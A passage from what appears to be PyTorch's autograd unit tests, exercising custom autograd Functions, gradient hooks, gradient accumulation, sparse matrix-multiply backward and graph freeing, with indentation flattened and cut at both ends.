from torch.autograd.function import InplaceFunction
import torch.autograd.forward_ad as fwAD
from torch.testing._internal.common_methods_invocations import (
unpack_variables,
mask_not_all_zeros,
S)
from torch.testing._internal.common_device_type import (instantiate_device_type_tests, skipCUDAIfRocm,
onlyCPU, onlyCUDA, onlyOnCPUAndCUDA, dtypes, dtypesIfCUDA,
deviceCountAtLeast, skipCUDAIfCudnnVersionLessThan,
skipCUDAIf, skipMeta)
# load_tests from common_utils is used to automatically filter tests for
# sharding on sandcastle. This line silences flake warnings
load_tests = load_tests
import pickle
PRECISION = 1e-4
def graph_desc(fn):
if fn is None:
return 'None'
result = type(fn).__name__ + '('
next_functions = fn.next_functions
for next_fn, _ in next_functions:
result += graph_desc(next_fn)
result += ', '
if next_functions:
result = result[:-2]
return result + ')'
class TestAutograd(TestCase):
def test_tensor_grad_warnings(self):
dummy = torch.empty(1)
with warnings.catch_warnings(record=True) as w:
# Accessing .grad on leaf
dummy.requires_grad_()
foo = dummy.grad
self.assertEqual(len(w), 0)
# Accessing .grad on non-leaf
dummy = dummy.clone()
foo = dummy.grad
self.assertEqual(len(w), 1)
# Accessing .grad on non-leaf that retains gradients
dummy.retain_grad()
foo = dummy.grad
self.assertEqual(len(w), 1)
def _function_test(self, cls):
x = torch.randn(5, 5, requires_grad=True)
y = torch.randn(5, 5, requires_grad=True)
result = cls.apply(x, 2, y)
go = torch.ones((), requires_grad=True)
result.sum().backward(go, create_graph=True)
self.assertEqual(x.grad, y + torch.ones(5, 5))
self.assertEqual(y.grad, x + torch.ones(5, 5) * 2)
self.assertIsNotNone(x.grad.grad_fn)
self.assertIsNotNone(y.grad.grad_fn)
return x, y
def test_function(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, tensor1, pyscalar, tensor2):
ctx.pyscalar = pyscalar
ctx.save_for_backward(tensor1, tensor2)
return tensor1 + pyscalar * tensor2 + tensor1 * tensor2
@staticmethod
def backward(ctx, grad_output):
var1, var2 = ctx.saved_tensors
# NOTE: self is the test case here
self.assertIsInstance(var1, torch.Tensor)
self.assertIsInstance(var2, torch.Tensor)
self.assertIsInstance(grad_output, torch.Tensor)
return (grad_output + grad_output * var2, None,
grad_output * ctx.pyscalar + grad_output * var1)
x, y = self._function_test(MyFunction)
x_grad_desc = graph_desc(x.grad.grad_fn)
y_grad_desc = graph_desc(y.grad.grad_fn)
self.assertExpected(x_grad_desc, "x_grad_desc")
self.assertExpected(y_grad_desc, "y_grad_desc")
def test_once_differentiable(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, tensor1, pyscalar, tensor2):
ctx.pyscalar = pyscalar
ctx.save_for_backward(tensor1, tensor2)
return tensor1 + pyscalar * tensor2 + tensor1 * tensor2
@staticmethod
@once_differentiable
def backward(ctx, grad_output):
self.assertFalse(torch.is_grad_enabled())
t1, t2 = ctx.saved_tensors
return (grad_output + grad_output * t2, None,
grad_output * ctx.pyscalar + grad_output * t1)
x, y = self._function_test(MyFunction)
self.assertEqual(graph_desc(x.grad.grad_fn),
'CopyBackwards(None, Error(AccumulateGrad(), None, AccumulateGrad()))')
self.assertEqual(graph_desc(y.grad.grad_fn),
'CopyBackwards(None, Error(AccumulateGrad(), None, AccumulateGrad()))')
def test_function_returns_input(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, grad):
return grad * 2
for shape in [(1,), ()]:
v = torch.ones(shape, requires_grad=True)
MyFunction.apply(v).backward()
self.assertEqual(v.grad, torch.full(shape, 2.))
with torch.no_grad():
v.grad.zero_()
MyFunction.apply(v.clone()).backward()
self.assertEqual(v.grad, torch.full(shape, 2.))
def test_function_returns_undefined_tensor(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, x):
return x * 2
@staticmethod
def backward(ctx, grad):
return None
# Test that undefined tensors returned from custom backward function
# are propagated as undefined and not as tensors full of zeros
x = torch.ones(1, requires_grad=True)
MyFunction.apply(x).backward()
self.assertIsNone(x.grad)
MyFunction.apply(x ** 2).backward()
self.assertIsNone(x.grad)
MyFunction.apply(x).sum().backward()
self.assertIsNone(x.grad)
self.assertIsNone(torch.autograd.grad(MyFunction.apply(x), x, allow_unused=True)[0])
def test_materialize_grads(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, grad):
self.assertEqual(grad, torch.zeros(1))
return grad
x = torch.ones(1, requires_grad=True)
torch._C._functions.UndefinedGrad()(MyFunction.apply(x)).backward()
def test_dont_materialize_grads(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, x):
ctx.set_materialize_grads(False)
return x
@staticmethod
def backward(ctx, grad):
self.assertIsNone(grad)
return grad
x = torch.ones(1, requires_grad=True)
torch._C._functions.UndefinedGrad()(MyFunction.apply(x)).backward()
def test_legacy_function_deprecation_exception(self):
# Trigger exception
class MyFunction(Function):
def forward(self, x):
return x
def backward(self, grad_output):
return grad_output
# Check exception occurs
with self.assertRaisesRegex(
RuntimeError,
'Legacy autograd function with non-static forward method is deprecated'):
MyFunction()(torch.randn(3, 4))
class SimulateBackwardError(Function):
@staticmethod
def forward(ctx, input):
return input.clone()
@staticmethod
@once_differentiable
def backward(ctx, input):
raise Exception("Simulate error on backward pass")
def test_custom_function_exception(self):
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
tmp = (t1 + t2) * (t1 + t2)
t3 = TestAutograd.SimulateBackwardError.apply(tmp)
with self.assertRaisesRegex(Exception, "Simulate error on backward pass"):
t3.sum().backward()
def test_custom_function_non_tensor_inputs_outputs(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, t1, t2, scale, t3):
t4 = t1 + t2 * t3
t5 = t1 * t2 + t3
t4 *= scale
t5 *= scale
# Save scale
ctx.scale = scale
ctx.save_for_backward(t1, t2, t3)
return scale, t4, None, True, t5, "bar", t1
@staticmethod
@once_differentiable
def backward(ctx, *grads):
# Verify grads
self.assertEqual(7, len(grads))
self.assertIsNone(grads[0])
self.assertIsNone(grads[2])
self.assertIsNone(grads[3])
self.assertIsNone(grads[5])
scale = ctx.scale
var1, var2, var3 = ctx.saved_tensors
return (
grads[1] * scale + grads[4] * var2 * scale + grads[6],
grads[1] * var3 * scale + grads[4] * var1 * scale,
None,
grads[1] * var2 * scale + grads[4] * scale,
)
t1 = torch.rand(10, dtype=torch.double, requires_grad=True)
t2 = torch.rand(10, dtype=torch.double, requires_grad=True)
t3 = torch.rand(10, dtype=torch.double)
scale = random.randint(0, 10)
res = MyFunction.apply(t1, t2, scale, t3)
self.assertEqual(scale, res[0])
self.assertEqual((t1 + t2 * t3) * scale, res[1])
self.assertEqual(None, res[2])
self.assertEqual(True, res[3])
self.assertEqual((t1 * t2 + t3) * scale, res[4])
self.assertEqual("bar", res[5])
self.assertEqual(t1, res[6])
# Validate running backward.
torch.autograd.backward([res[1].sum(), res[4].sum(), res[6].sum()])
self.assertIsNotNone(t1.grad)
self.assertIsNotNone(t2.grad)
self.assertIsNone(t3.grad)
# Test gradcheck
def foo(t1, t2, t3):
res = MyFunction.apply(t1, t2, scale, t3)
return res[1], res[4], res[6]
gradcheck(foo, (t1, t2, t3))
def test_custom_function_no_tensors(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, t1, t2, scale, t3):
t4 = t1 + t2 * t3
t5 = t1 * t2 + t3
t4 *= scale
t5 *= scale
return scale, t4, None, True, t5, "bar", t1
@staticmethod
@once_differentiable
def backward(ctx, *args):
return (args[0], args[1], None, args[2])
t1 = random.random()
t2 = random.random()
t3 = random.random()
scale = random.randint(0, 10)
res = MyFunction.apply(t1, t2, scale, t3)
self.assertEqual(scale, res[0])
self.assertEqual((t1 + t2 * t3) * scale, res[1])
self.assertEqual(None, res[2])
self.assertEqual(True, res[3])
self.assertEqual((t1 * t2 + t3) * scale, res[4])
self.assertEqual("bar", res[5])
self.assertEqual(t1, res[6])
def test_invalid_gradients(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, x):
return x * 2
@staticmethod
def backward(ctx, grad_output):
return torch.randn(10, dtype=torch.float)
with self.assertRaisesRegex(RuntimeError, 'expected shape'):
input = torch.randn(5, 5, dtype=torch.float, requires_grad=True)
MyFunction.apply(input).sum().backward()
def test_unrelated_inputs(self):
# test to ensure grad(grad)check runs successfully even if there is an
# unrelated (but differentiable) input
def my_function(x, y):
return x * x
x = torch.rand(10, dtype=torch.double, requires_grad=True)
y = torch.rand(10, dtype=torch.double, requires_grad=True)
gradcheck(my_function, (x, y))
gradgradcheck(my_function, (x, y))
def test_not_implemented_grad(self):
a = torch.rand(2, requires_grad=True)
# if grad for nextafter ends up being implemented, this should be changed
y = torch.nextafter(a, a).sum()
with self.assertRaisesRegex(
NotImplementedError,
'the derivative for .* is not implemented'):
y.backward()
def test_not_implemented_fwad(self):
x = torch.randn(3)
v = torch.rand(3)
mat = torch.randn(2, 3)
with fwAD.dual_level():
dual_x = fwAD.make_dual(x, v)
err_msg = r"Trying to use forward AD with .* that does not support it"
hint_msg = "Running forward AD for an OP that does not implement it should raise a NotImplementedError"
with self.assertRaisesRegex(NotImplementedError, err_msg, msg=hint_msg):
# if forward AD ends up being implemented for torch.mv, choose a different op
res = torch.mv(mat, dual_x)
def test_accumulate_grad(self):
grad_output = torch.ones(5, 5)
def compute_grad(create_graph):
x = torch.randn(5, 5, requires_grad=True)
y = x + 2
y.backward(grad_output, retain_graph=True)
x_grad = x.grad
x_grad_clone = x.grad.clone()
y.backward(grad_output, create_graph=create_graph)
return x_grad, x_grad_clone
# Accumulate in-place when create_graph is False
x_grad, x_grad_clone = compute_grad(create_graph=False)
self.assertEqual(x_grad, x_grad_clone * 2)
# Accumulate out-of-place when create_graph is True
x_grad, x_grad_clone = compute_grad(create_graph=True)
self.assertEqual(x_grad, x_grad_clone)
def test_accumulate_grad_tensor_reference(self):
def _test_grad_tensor(params_grad_tensor, backward_grad_tensor, should_preserve_reference, create_graph):
params = torch.tensor([1.5, 1.5]).requires_grad_()
params.grad = params_grad_tensor
grad_saved = params.grad
params.backward(backward_grad_tensor, create_graph=create_graph)
self.assertEqual(id(grad_saved) == id(params.grad), should_preserve_reference)
for create_graph in (False, True):
# Accumulate dense gradient to sparse gradient will change the `params.grad` reference
_test_grad_tensor(
torch.sparse_coo_tensor(torch.tensor([[1, 1]]).long(), torch.tensor([1., 1.])),
torch.tensor([1.5, 1.5]),
False, # never accumulates in-place
create_graph)
# Accumulate dense gradient to dense gradient will preserve the `params.grad` reference,
# but only if create_graph=False.
_test_grad_tensor(
torch.tensor([1.5, 1.5]),
torch.tensor([1.5, 1.5]),
not create_graph,
create_graph)
# Accumulate sparse gradient to sparse gradient will preserve the `params.grad` reference,
# but only if create_graph=False.
_test_grad_tensor(
torch.sparse_coo_tensor(torch.tensor([[1, 1]]).long(), torch.tensor([1., 1.])),
torch.sparse_coo_tensor(torch.tensor([[1, 1]]).long(), torch.tensor([1., 1.])),
not create_graph,
create_graph)
@skipIfNoLapack
def test_slogdet_sign(self):
a = torch.randn(3, 3, dtype=torch.double, requires_grad=True)
s, logdet = a.slogdet()
# test that sign should not require grad
self.assertFalse(s.requires_grad)
# test that backward through computation involving sign works
def sign_mul_logdet(mat):
s, logdet = mat.slogdet()
return s * logdet
u, s, v = a.detach().svd()
s.abs_().clamp_(0.0001)
for sign in (-1, 1):
s[-1] = sign
mat = torch.linalg.multi_dot([u, s.diag(), v.t()]).requires_grad_()
gradcheck(sign_mul_logdet, mat)
gradgradcheck(sign_mul_logdet, mat)
def test_sum_to_with_empty_dim_grad(self):
a = torch.rand(4, 0, requires_grad=True)
b = torch.rand(4, 1, requires_grad=True)
c = a + b
assert c.shape == (4, 0)
c.sum().backward()
self.assertEqual(b.grad, torch.zeros(4, 1))
self.assertEqual(a.grad, torch.zeros(4, 0))
def test_hessian_vector(self):
x = torch.randn(2, 2, requires_grad=True)
y = torch.randn(2, 2, requires_grad=True)
z = x ** 2 + y * x + y ** 2
z.backward(torch.ones(2, 2), create_graph=True)
with torch.no_grad():
x_grad = 2 * x + y
y_grad = x + 2 * y
self.assertEqual(x.grad, x_grad)
self.assertEqual(y.grad, y_grad)
grad_sum = 2 * x.grad + y.grad
grad_sum.backward(torch.ones(2, 2))
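# grad_sum = 2*(2x + y) + (x + 2y) = 5x + 4y, so backpropagating ones through it
# adds a constant 5 to x.grad and 4 to y.grad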
x_hv = torch.ones(2, 2) * 5
y_hv = torch.ones(2, 2) * 4
self.assertEqual(x.grad, x_grad + x_hv)
self.assertEqual(y.grad, y_grad + y_hv)
def test_grad(self):
x = torch.randn(2, 2, requires_grad=True)
y = torch.randn(2, 2, requires_grad=True)
z = x ** 2 + y * x + y ** 2
z.backward(torch.ones(2, 2), create_graph=True)
x_grad = 2 * x + y
y_grad = x + 2 * y
self.assertEqual(x.grad, x_grad)
self.assertEqual(y.grad, y_grad)
grad_sum = 2 * x.grad + y.grad
x_hv = torch.autograd.grad(
outputs=[grad_sum], grad_outputs=[torch.ones(2, 2)],
inputs=[x], create_graph=True)
expected_x_hv = torch.ones(2, 2) * 5
expected_y_hv = torch.ones(2, 2) * 4
self.assertEqual(x_hv[0], expected_x_hv)
self.assertEqual(x.grad, x_grad)
self.assertEqual(y.grad, y_grad)
# Test that grad_outputs and outputs have the same shape
grad_out = torch.ones(2)
try:
torch.autograd.grad(
outputs=[grad_sum], grad_outputs=[grad_out],
inputs=[x], create_graph=True)
self.fail()
except RuntimeError as error:
self.assertEqual(str(error), "Mismatch in shape: grad_output[0] has a shape of "
+ str(grad_out.shape) + " and output[0] has a shape of "
+ str(grad_sum.shape) + ".")
def test_grad_nonleaf(self):
x_init = torch.randn(2, 2, requires_grad=True)
x = x_init
y = torch.randn(2, 2, requires_grad=True)
grad_output = torch.ones(2, 2)
def fn(x):
return x ** 2 + y * x + y ** 2
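# take a few gradient-ascent steps; since x moves along the gradient of fn,
# the final value of fn should exceed the initial one (checked below)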
for _ in range(5):
grad_x, = torch.autograd.grad(
fn(x), x, grad_outputs=grad_output, create_graph=True)
grad_x_expected = 2 * x + y
self.assertIsNone(y.grad)
self.assertIsNone(x.grad)
self.assertEqual(grad_x, grad_x_expected)
x = x + 0.05 * grad_x
val_init = fn(x_init).sum()
val_final = fn(x).sum()
self.assertGreater(val_final, val_init)
x.backward(grad_output)
self.assertIsNotNone(y.grad)
self.assertIsNotNone(x_init.grad)
def test_grad_nonleaf_many_outputs(self):
# This checks an edge case for function callbacks
# We want to capture two grads of a function, but can only
# register a single callback.
x = torch.randn(4, 2, requires_grad=True)
a, b = x.chunk(2)
def hook(*grads):
hook_called[0] = True
hook_called = [False]
x.register_hook(hook)
go = torch.randn(2, 2)
grad_a, grad_b = torch.autograd.grad(
(a + 2 * b), [a, b], grad_outputs=go, create_graph=True)
self.assertEqual(grad_a, go)
self.assertEqual(grad_b, go * 2)
self.assertFalse(hook_called[0])
self.assertIsNone(x.grad)
def test_grad_nonleaf_register_hook(self):
# This checks an edge case for register_hook.
# We want to capture grad of a nonleaf tensor,
# but avoid segfault during backward of other nonleaf tensors
x = torch.randn(5, requires_grad=True)
x_list = x.unbind()
x0 = x_list[0]
hook_results = [None]
def hook(grad):
hook_results[0] = grad
x0.register_hook(hook)
x_list[0].backward()
self.assertEqual(hook_results[0], torch.tensor(1.))
expected_grad = torch.tensor([1., 0, 0, 0, 0])
self.assertEqual(x.grad, expected_grad)
self.assertIsNone(x_list[0].grad)
for i in range(1, 5, 1):
x_list[i].backward()
self.assertEqual(hook_results[0], None)
expected_grad[i] = 1.0
self.assertEqual(x.grad, expected_grad)
self.assertIsNone(x_list[i].grad)
def test_hook_with_no_name(self):
# Create a hook that does not have a __name__ attribute
class MyHookClass:
def __call__(self, grad):
return grad.clone()
x = torch.randn(5, requires_grad=True).clone()
x.register_hook(MyHookClass())
x.sum().backward()
# Should run fine
def test_sharded_grad(self):
leaves = [torch.zeros(5, 5, requires_grad=True) for _ in range(10)]
intermediates = [l * i + l * l for i, l in enumerate(leaves)]
loss = sum(v * i for i, v in enumerate(intermediates)).sum()
# define a helper for dividing intermediates into groups
def group(l, group_size):
return (l[i:i + group_size] for i in range(0, len(l), group_size))
# Compute the d loss / d intermediates in chunks of shard_size
shard_size = 2
d_intermediates = [d_i for intermediates_batch in group(intermediates, shard_size)
for d_i in torch.autograd.grad(loss, intermediates_batch)]
# Compute rest of backward pass
torch.autograd.backward(intermediates, d_intermediates)
for i, l in enumerate(leaves):
self.assertEqual(l.grad, i * i * (1 + l))
def test_backward_badcalls(self):
x = torch.ones(1)
with self.assertRaisesRegex(RuntimeError, 'does not require grad'):
x.backward()
def test_grad_badcalls(self):
x = torch.ones(1)
y = x ** 2
with self.assertRaisesRegex(RuntimeError, 'does not require grad'):
torch.autograd.grad(x, y)
with self.assertRaisesRegex(RuntimeError, 'does not require grad'):
torch.autograd.grad(y, x)
x = torch.ones(1, requires_grad=True)
y = x ** 2
torch.autograd.grad(y, x) # this should succeed now
def test_grad_empty_inputs(self):
x = torch.tensor([1.0], requires_grad=True)
with self.assertRaisesRegex(ValueError, "grad requires non-empty inputs."):
torch.autograd.grad(2 * x, [], grad_outputs=torch.tensor([1.0]))
def test_grad_fn_badcalls(self):
error_regex = 'expected .* arguments, got .* instead'
x = torch.ones(1, requires_grad=True)
y = x ** 2
with self.assertRaisesRegex(TypeError, error_regex):
y.grad_fn(x.detach(), x.detach()) # too many
with self.assertRaisesRegex(TypeError, error_regex):
y.grad_fn() # too few
y.grad_fn(x.detach()) # this should succeed
def test_grad_unreachable(self):
x = torch.ones(1, requires_grad=True)
y = torch.ones(1, requires_grad=True)
# Make sure x and y have grad accumulators allocated
z = x * 2
w = y * 2
grad_x, grad_y = torch.autograd.grad(x * 2, [x, y], allow_unused=True)
self.assertEqual(grad_x, x * 2)
self.assertIsNone(grad_y)
        # This is slightly different from the case above, because z doesn't even
# have a grad accumulator allocated.
z = torch.ones(1, requires_grad=True)
grad_x, grad_z = torch.autograd.grad(x * 2, [x, z], allow_unused=True)
self.assertEqual(grad_x, x * 2)
self.assertIsNone(grad_z)
# allow_unused=False, but grads contains None inside, should throw
with self.assertRaisesRegex(RuntimeError,
"Set allow_unused=True"):
grad_x, grad_y = torch.autograd.grad(x * 2, [x, y], allow_unused=False)
def test_grad_unreachable_discovery(self):
# Test that certain nodes are not erroneously executed when an input
# is unreachable. See #39784
class MyFunc(torch.autograd.Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, x):
self.fail("This node should not be executed!")
x = MyFunc.apply(torch.randn(1, requires_grad=True) * 2)
y = torch.randn(1, requires_grad=True)
(gY,) = torch.autograd.grad(x, (y, ), allow_unused=True)
self.assertIsNone(gY)
x = MyFunc.apply(torch.randn(1, requires_grad=True) * 2)
y = torch.randn(1, requires_grad=True)
z = torch.randn(1, requires_grad=True)
(gY, gZ) = torch.autograd.grad(x + z, (y, z), allow_unused=True)
self.assertIsNone(gY)
self.assertIsNotNone(gZ)
x = MyFunc.apply(torch.randn(1, requires_grad=True) * 2)
y = torch.randn(1, requires_grad=True)
torch.autograd.backward(x, inputs=(y, )) # allow_unused is implicitly True!
self.assertIsNone(y.grad)
def test_hooks(self):
x = torch.ones(5, 5, requires_grad=True)
y = torch.ones(5, 5) * 4
y.requires_grad_(True)
counter = [0]
def bw_hook(inc, grad):
self.assertIsInstance(grad, torch.Tensor)
counter[0] += inc
z = x ** 2 + x * 2 + x * y + y
x.register_hook(lambda *args: bw_hook(0, *args))
test = z.register_hook(lambda *args: bw_hook(1, *args))
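        # The hook on x adds 0, so the counter only tracks how many hooks
        # registered on z fire during each backward pass.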
z.backward(torch.ones(5, 5), retain_graph=True)
self.assertEqual(counter[0], 1)
test2 = z.register_hook(lambda *args: bw_hook(2, *args))
z.backward(torch.ones(5, 5), retain_graph=True)
self.assertEqual(counter[0], 4)
test2.remove()
z.backward(torch.ones(5, 5), retain_graph=True)
self.assertEqual(counter[0], 5)
def bw_hook_modify(grad):
return grad.mul(2)
test.remove()
z.register_hook(bw_hook_modify)
with torch.no_grad():
y.grad.zero_()
z.backward(torch.ones(5, 5), retain_graph=True)
self.assertEqual(y.grad, (x + 1) * 2)
y.register_hook(bw_hook_modify)
with torch.no_grad():
y.grad.zero_()
z.backward(torch.ones(5, 5))
self.assertEqual(y.grad, (x + 1) * 4)
def test_hooks_cpp(self):
# Tests hooks for autograd function implemented in C++
bn = torch.nn.BatchNorm1d(5, affine=False)
bn.double()
bn.eval()
counter = [0]
def bw_hook(grad):
counter[0] += 1
return grad * 2
x = torch.ones(5, 5, dtype=torch.double, requires_grad=True)
z = bn(x)
z.register_hook(bw_hook)
z.sum().backward()
self.assertEqual(counter[0], 1, msg='bw_hook not called')
self.assertEqual(x.grad, torch.ones(5, 5, dtype=torch.double) * 2, atol=1e-5, rtol=0)
def test_hook_none(self):
# WARNING: this is a test for autograd internals.
# You should never have to use such things in your code.
class NoneGradientFunction(Function):
@staticmethod
def forward(ctx, x, y):
assert ctx.needs_input_grad[0]
assert not ctx.needs_input_grad[1]
return x, y
@staticmethod
def backward(ctx, grad_x, grad_y):
return grad_x, None
was_called = [False]
def hook(grad):
self.assertIsNotNone(grad)
was_called[0] = True
x = torch.randn(5, 5, requires_grad=True)
y = torch.randn(5, 5)
rx, ry = NoneGradientFunction.apply(x, y)
rx.register_hook(hook)
ry.register_hook(hook)
sum(rx, ry).sum().backward()
self.assertTrue(was_called[0])
def test_retain_grad(self):
input = torch.rand(1, 3, requires_grad=True)
h1 = input * 3
out = (h1 * h1).sum()
# It should be possible to call retain_grad() multiple times
h1.retain_grad()
h1.retain_grad()
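        # d out / d h1 = 2 * h1, so every backward pass below adds h1 * 2 to h1.grad.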
# Gradient should be accumulated
out.backward(retain_graph=True)
self.assertEqual(h1 * 2, h1.grad)
out.backward(retain_graph=True)
self.assertEqual(h1 * 4, h1.grad)
with torch.no_grad():
input.grad.zero_()
# It should be a no-op for leaves
input.retain_grad()
input.retain_grad()
out.backward()
self.assertEqual(input * 18, input.grad)
def test_retain_grad_cycle(self):
x = torch.ones(5, 5, requires_grad=True)
def run_test():
y = x * 2
y.retain_grad()
return y / 2, torch._C._WeakTensorRef(y)
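        # retain_grad() must not create a reference cycle that keeps y alive:
        # the weak reference should expire once run_test() returns, while the
        # graph held by z still allows a backward pass.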
z, ref = run_test()
self.assertTrue(ref.expired())
z.sum().backward()
def test_backward(self):
v = torch.randn(5, 5, requires_grad=True)
x = torch.randn(5, 5, requires_grad=True)
y = (torch.rand(5, 5) + 0.1).requires_grad_(True)
z = torch.randn(5, 5, requires_grad=True)
grad_output = torch.randn(5, 5)
v.backward(grad_output)
self.assertEqual(v.grad, grad_output)
a = x + (y * z) + 4 * z ** 2 * x / y
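        # For a = x + y*z + 4*z**2*x/y:
        #   da/dx = 1 + 4*z**2/y, da/dy = z - 4*x*z**2/y**2, da/dz = y + 8*x*z/y,
        # which matches the expected gradients computed below.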
a.backward(grad_output)
x_grad = 4 * z.pow(2) / y + 1
y_grad = z - 4 * x * z.pow(2) / y.pow(2)
z_grad = 8 * x * z / y + y
self.assertEqual(x.grad, x_grad * grad_output)
self.assertEqual(y.grad, y_grad * grad_output)
self.assertEqual(z.grad, z_grad * grad_output)
def test_sparse_mm_backward(self):
size = (3, 3)
sparse = torch.sparse_coo_tensor(size, requires_grad=True)
dense = torch.randn(size, requires_grad=True)
with self.assertRaisesRegex(
RuntimeError,
"The backward pass for this operation requires the 'mat1' tensor to be strided,"):
z = dense.addmm(sparse, dense)
mm_test_cases = [
# a requires grad, a is sparse, b requires grad, b is sparse, error message
(False, True, True, False, None),
(False, False, True, True, "The backward pass for this operation requires the 'mat2'"),
(False, True, True, True, "The backward pass for this operation requires the 'mat2'"),
(True, False, True, True, "The backward pass for this operation requires the 'mat2'"),
(True, True, False, False, "The backward pass for this operation requires the 'self'"),
(True, True, True, False, "The backward pass for this operation requires the 'self'"),
(True, True, True, True, "The backward pass for this operation requires the 'mat2'"),
]
for a_req_grad, a_is_sparse, b_req_grad, b_is_sparse, err_msg in mm_test_cases:
# We should only be testing cases with sparse inputs, and at least one
# input needs to require grad so we can call a backward pass
assert a_is_sparse or b_is_sparse
assert a_req_grad or b_req_grad
a = torch.randn(size, requires_grad=a_req_grad)
if a_is_sparse:
a = a.to_sparse()
b = torch.randn(size, requires_grad=b_req_grad)
if b_is_sparse:
b = b.to_sparse()
# If no error expected, check that sparse and dense cases match
if err_msg is None:
r = a.mm(b)
r.sum().backward()
a_grad = None if a.grad is None else a.grad.clone().detach()
b_grad = None if b.grad is None else b.grad.clone().detach()
# Redo with only dense tensors
a = (a.to_dense() if a.is_sparse else a).clone().detach()
a.requires_grad = a_req_grad
b = (b.to_dense() if b.is_sparse else b).clone().detach()
b.requires_grad = b_req_grad
r = a.mm(b)
r.sum().backward()
self.assertEqual(a_grad, a.grad)
self.assertEqual(b_grad, b.grad)
else:
with self.assertRaisesRegex(RuntimeError, err_msg):
a.mm(b)
def test_multi_backward(self):
x = torch.randn(5, 5, requires_grad=True)
y = torch.randn(5, 5, requires_grad=True)
q = torch.randn(5, 5, requires_grad=True)
a = torch.randn(5, 5, requires_grad=True)
b = torch.randn(5, 5, requires_grad=True)
q2 = q * 2
z = x + y + q2
c = a * b + q2
grad_z = torch.randn(5, 5)
grad_c = torch.randn(5, 5)
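        # q2 = q * 2 feeds both roots z and c, so q.grad accumulates
        # contributions from both: (grad_z + grad_c) * 2.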
torch.autograd.backward([z, c], [grad_z, grad_c])
self.assertEqual(x.grad, grad_z)
self.assertEqual(y.grad, grad_z)
self.assertEqual(a.grad, grad_c * b)
self.assertEqual(b.grad, grad_c * a)
self.assertEqual(q.grad, (grad_c + grad_z) * 2)
def test_multi_backward_no_grad(self):
x = torch.randn(5, 5, requires_grad=True)
y = torch.randn(5, 5, requires_grad=False)
z = x + y
q = y * 2
# NB: we currently raise an exception if any arguments to backwards
# have requires_grad=False and don't have a grad_fn. We may want to
# relax that check to a warning.
def call_backwards():
torch.autograd.backward([z, q], [torch.ones(5, 5), torch.ones(5, 5)])
self.assertRaises(RuntimeError, call_backwards)
def test_backward_with_inputs(self):
x = torch.randn(2, 2, dtype=torch.double, requires_grad=True)
y = torch.randn(2, 2, dtype=torch.double, requires_grad=True)
def fn():
return x ** 2 + y * x + y ** 2
gradient = torch.ones(2, 2)
x_grad_expected = 2 * x + y
y_grad_expected = x + 2 * y
@torch.no_grad()
def reset_grad():
x.grad.zero_()
y.grad.zero_()
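        # Passing inputs= restricts gradient accumulation to the listed tensors;
        # a leaf that is left out keeps the zeroed .grad set by reset_grad().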
torch.autograd.backward(fn(), gradient, inputs=[x, y])
self.assertEqual(x.grad, x_grad_expected)
self.assertEqual(y.grad, y_grad_expected)
reset_grad()
torch.autograd.backward(fn(), gradient, inputs=[x])
self.assertEqual(x.grad, x_grad_expected)
self.assertEqual(y.grad, torch.zeros(2, 2), exact_dtype=False)
reset_grad()
torch.autograd.backward(fn(), gradient, inputs=[y])
self.assertEqual(y.grad, y_grad_expected)
self.assertEqual(x.grad, torch.zeros(2, 2), exact_dtype=False)
reset_grad()
torch.autograd.backward(fn(), gradient, inputs=y)
self.assertEqual(y.grad, y_grad_expected)
self.assertEqual(x.grad, torch.zeros(2, 2), exact_dtype=False)
reset_grad()
self.assertRaisesRegex(RuntimeError, 'cannot be empty',
lambda: torch.autograd.backward(fn(), gradient, inputs=[]))
def test_backward_with_nonleaf_inputs(self):
x = torch.randn(2, 2, dtype=torch.double, requires_grad=True)
x_nonleaf = x * 1
y = torch.randn(2, 2, dtype=torch.double, requires_grad=True)
z = torch.randn(2, 2, dtype=torch.double, requires_grad=True)
out = x_nonleaf ** 2 + y * x_nonleaf + y ** 2
out.backward(torch.ones(2, 2, dtype=torch.double), create_graph=True, inputs=[x, y, x_nonleaf])
x_grad_expected = 2 * x + y
y_grad_expected = x + 2 * y
x_non_leaf_expected = 2 * x_nonleaf + y
self.assertEqual(y.grad, y_grad_expected)
self.assertEqual(x.grad, x_grad_expected)
self.assertEqual(x_nonleaf.grad, x_non_leaf_expected)
        # backward doesn't have an allow_unused flag, so when a listed input is
        # not part of the graph it behaves as if allow_unused were True:
        # the unused input's grad simply stays None.
out.backward(torch.ones(2, 2, dtype=torch.double), create_graph=True, inputs=[z])
self.assertIsNone(z.grad)
def test_dependent_backward(self):
x = torch.randn(10, requires_grad=True)
y = x ** 2
z = y ** 3
go_y = torch.randn(10)
go_z = torch.randn(10)
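        # y = x**2 and z = x**6, so x.grad = 2*x*go_y + 6*x**5*go_z.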
torch.autograd.backward([y, z], [go_y, go_z])
xd = x
self.assertEqual(x.grad, 2 * xd * go_y + 6 * xd.pow(5) * go_z)
def test_save_output_nr(self):
x = torch.randn(10, requires_grad=True)
class MultiOutputFn(Function):
@staticmethod
def forward(ctx, x):
return x[:5], x[5:]
@staticmethod
def backward(ctx, *grad):
return torch.cat(grad)
a, b = MultiOutputFn.apply(x)
self.assertEqual(b.output_nr, 1)
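        # b came from the second output slot of MultiOutputFn; saving it with
        # save_for_backward and unpacking it in backward should preserve output_nr.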
class TestFn(Function):
@staticmethod
def forward(ctx, b):
ctx.save_for_backward(b)
return b * 2
@staticmethod
def backward(ctx, grad_b):
b, = ctx.saved_tensors
self.assertEqual(b.output_nr, 1)
TestFn.apply(b).sum().backward()
def test_free_deep_graph(self):
def scope():
depth = 150000
x = torch.randn(1, requires_grad=True)
y = x.clone()
# build a "chain" computation graph
for _ in range(depth):
y = y + y * 0.000001
# graph deletion occurs when the above locals go out of scope.
# In this case `del y` will trigger it but it's easier to leave
# it to Python to delete the locals.
# Should not stack overflow
scope()
def test_free_deep_graph_complicated(self):
def scope():
depth = 100000
randchoice = torch.randint(2, [depth, 2])
x = torch.randn(1, requires_grad=True)
y = x.clone()
